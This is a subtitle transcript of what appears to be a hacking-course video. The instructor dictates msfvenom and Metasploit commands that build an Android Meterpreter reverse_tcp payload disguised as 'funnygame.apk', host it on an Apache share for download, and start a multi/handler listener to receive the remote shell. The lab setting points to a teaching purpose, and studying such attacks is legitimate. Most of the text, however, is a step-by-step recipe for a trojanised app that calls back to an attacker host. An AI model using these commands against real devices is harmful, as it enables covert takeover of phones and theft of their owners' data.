1
00:00:00,990 --> 00:00:08,730
We've got our Android device up and running and we have our Kali Linux box ready, logged in, and to give

2
00:00:08,730 --> 00:00:19,560
you an idea of the number of exploits that we can set up using msfvenom, just run msfvenom -l.

3
00:00:19,560 --> 00:00:25,610
Well, this should list the exploits that are included in the Metasploit Framework's msfvenom.

4
00:00:26,310 --> 00:00:31,110
This is what allows us to create payloads and then send those to devices.

5
00:00:32,920 --> 00:00:39,700
You can see this is quite several screens full, tons of x86.

6
00:00:41,620 --> 00:00:43,090
Tons of Windows.

7
00:00:44,310 --> 00:00:53,820
Tons of Windows, some PHP, so we can run those on web servers, some OSX, so if you want to test

8
00:00:53,820 --> 00:01:02,890
some macOS security, you've got it here too. Node.js, Linux, BSD.

9
00:01:03,390 --> 00:01:10,020
And then finally, as we get toward the top, we see some Android exploits that are included in here,

10
00:01:10,020 --> 00:01:19,320
including our old friend, meterpreter: android/meterpreter/reverse_http, android/meterpreter/

11
00:01:19,320 --> 00:01:20,880
reverse_tcp.

12
00:01:20,880 --> 00:01:22,080
Could it be that easy?

13
00:01:22,470 --> 00:01:23,540
Well, let's find out.

14
00:01:23,550 --> 00:01:31,260
Let's dig in and use msfvenom to set up our own android/meterpreter/reverse_tcp exploit and see if

15
00:01:31,260 --> 00:01:33,300
we can get it on to our Android device.

16
00:01:33,820 --> 00:01:41,550
So I'm going to clear the screen first, and very similar to the way we exploited Windows 7 and Windows

17
00:01:41,550 --> 00:01:41,900
10.

18
00:01:42,210 --> 00:01:48,140
We're going to set up msfvenom, the payload flag, -p.

19
00:01:48,450 --> 00:01:49,710
We'll say android

20
00:01:51,020 --> 00:01:52,730
/meterpreter
21
00:01:54,940 --> 00:02:03,760
/reverse_tcp. We do need an LHOST, so if you don't remember your Kali Linux

22
00:02:03,760 --> 00:02:05,920
IP address, you can start a new window.

23
00:02:07,020 --> 00:02:14,550
And run ifconfig, but we're still running at 10.0.3.5 because we made sure

24
00:02:14,550 --> 00:02:16,020
we were on our private network.

25
00:02:16,530 --> 00:02:18,180
So we need LHOST.

26
00:02:19,840 --> 00:02:20,590
Equals.

27
00:02:22,950 --> 00:02:29,760
10.0.3.5, and we don't need a file format because there's only one format for

28
00:02:29,760 --> 00:02:34,980
Android devices, that's an APK or an Android package file, but we do need to tell it where to put the

29
00:02:34,980 --> 00:02:35,550
output.

30
00:02:35,880 --> 00:02:40,880
And I will put that directly on the desktop again and then I'll copy it over.

31
00:02:40,890 --> 00:02:46,740
You can also just output this directly into your /var/www/html/share folder if you still have that from earlier.

32
00:02:47,130 --> 00:02:50,010
But I will say -o, output.

33
00:02:51,470 --> 00:02:58,620
/root/Desktop/, let's call this funnygame

34
00:02:58,880 --> 00:03:06,110
.apk, funnygame.apk, just like our Windows meterpreter.

35
00:03:06,380 --> 00:03:10,850
This is going to set up an Android version of meterpreter, a command-line shell that's going to

36
00:03:10,850 --> 00:03:15,470
give us access to that Android device, just like the Windows meterpreter examples did.
37
00:03:15,920 --> 00:03:21,470
And we have had to specify our LHOST at 10.0.3.5 so that when that reverse

38
00:03:21,470 --> 00:03:29,750
TCP comes calling, our LHOST will be where it calls back to, and then we've output that to the desktop

39
00:03:29,750 --> 00:03:35,270
as funnygame.apk. It should take just a moment to run, and now you'll notice I have a funnygame.apk

40
00:03:35,270 --> 00:03:37,970
file right here on my desktop.

41
00:03:38,390 --> 00:03:46,940
Well, if you still have your /var/www/html/share folder from the Windows 7 and Windows 10 hacks,

42
00:03:47,330 --> 00:03:56,320
we should just be able to cp ./Desktop/

43
00:03:56,330 --> 00:03:56,870
funny

44
00:03:58,100 --> 00:04:09,410
game.apk to /var/www (tab), /html (tab), /share (tab), and now if we ls that

45
00:04:09,530 --> 00:04:13,730
/var/www/html/share.

46
00:04:14,970 --> 00:04:21,720
We should see the game.exe, see the funvideo.exe that we created for our Windows 7 and

47
00:04:21,720 --> 00:04:28,260
Windows 10, and now we have funnygame.apk, that Android package file.

48
00:04:28,620 --> 00:04:34,230
It's going to allow us to run meterpreter on a vulnerable Android device.

49
00:04:34,620 --> 00:04:38,340
So let's make sure that the Apache server is running: service

50
00:04:40,520 --> 00:04:48,950
apache2 start. Then let's go ahead and run msfconsole so we can listen using that multi/handler.

51
00:04:49,520 --> 00:04:51,110
msfconsole.

52
00:04:54,110 --> 00:05:00,500
You can also just run Metasploit from any of your links under Applications or here on the left-hand

53
00:05:00,500 --> 00:05:00,890
bar.

54
00:05:02,570 --> 00:05:09,200
We'll say use exploit/multi/handler, set the payload

55
00:05:10,670 --> 00:05:13,730
as android/meterpreter

56
00:05:15,100 --> 00:05:19,840
/reverse (tab), t (tab), reverse_tcp.
57
00:05:21,950 --> 00:05:25,190
Just like before, we want to set our LHOST.

58
00:05:27,530 --> 00:05:34,430
To 10.0.3.5, our Kali Linux IP address; whatever yours is goes right there.

59
00:05:36,960 --> 00:05:39,870
And we can show options just like we've done before.

60
00:05:42,480 --> 00:05:45,540
Those are the only two required things, the LHOST and the LPORT.

61
00:05:48,650 --> 00:05:51,650
So we're ready to run the exploit: exploit

62
00:05:53,180 --> 00:05:55,050
-j -z.

63
00:05:56,630 --> 00:06:05,060
And so now we have a meterpreter listening for any Android device to call in using that 10.0.

64
00:06:05,120 --> 00:06:11,470
3.5 apk file; it's going to bring them back to this machine.

65
00:06:12,470 --> 00:06:16,940
So we'll switch back over to Android and we'll actually change our browser settings

66
00:06:16,940 --> 00:06:19,130
so that we'll be able to download this file effectively.

67
00:06:19,640 --> 00:06:22,150
And then we'll give this exploit a try.

68
00:06:22,340 --> 00:06:23,750
We'll see you in the next lesson.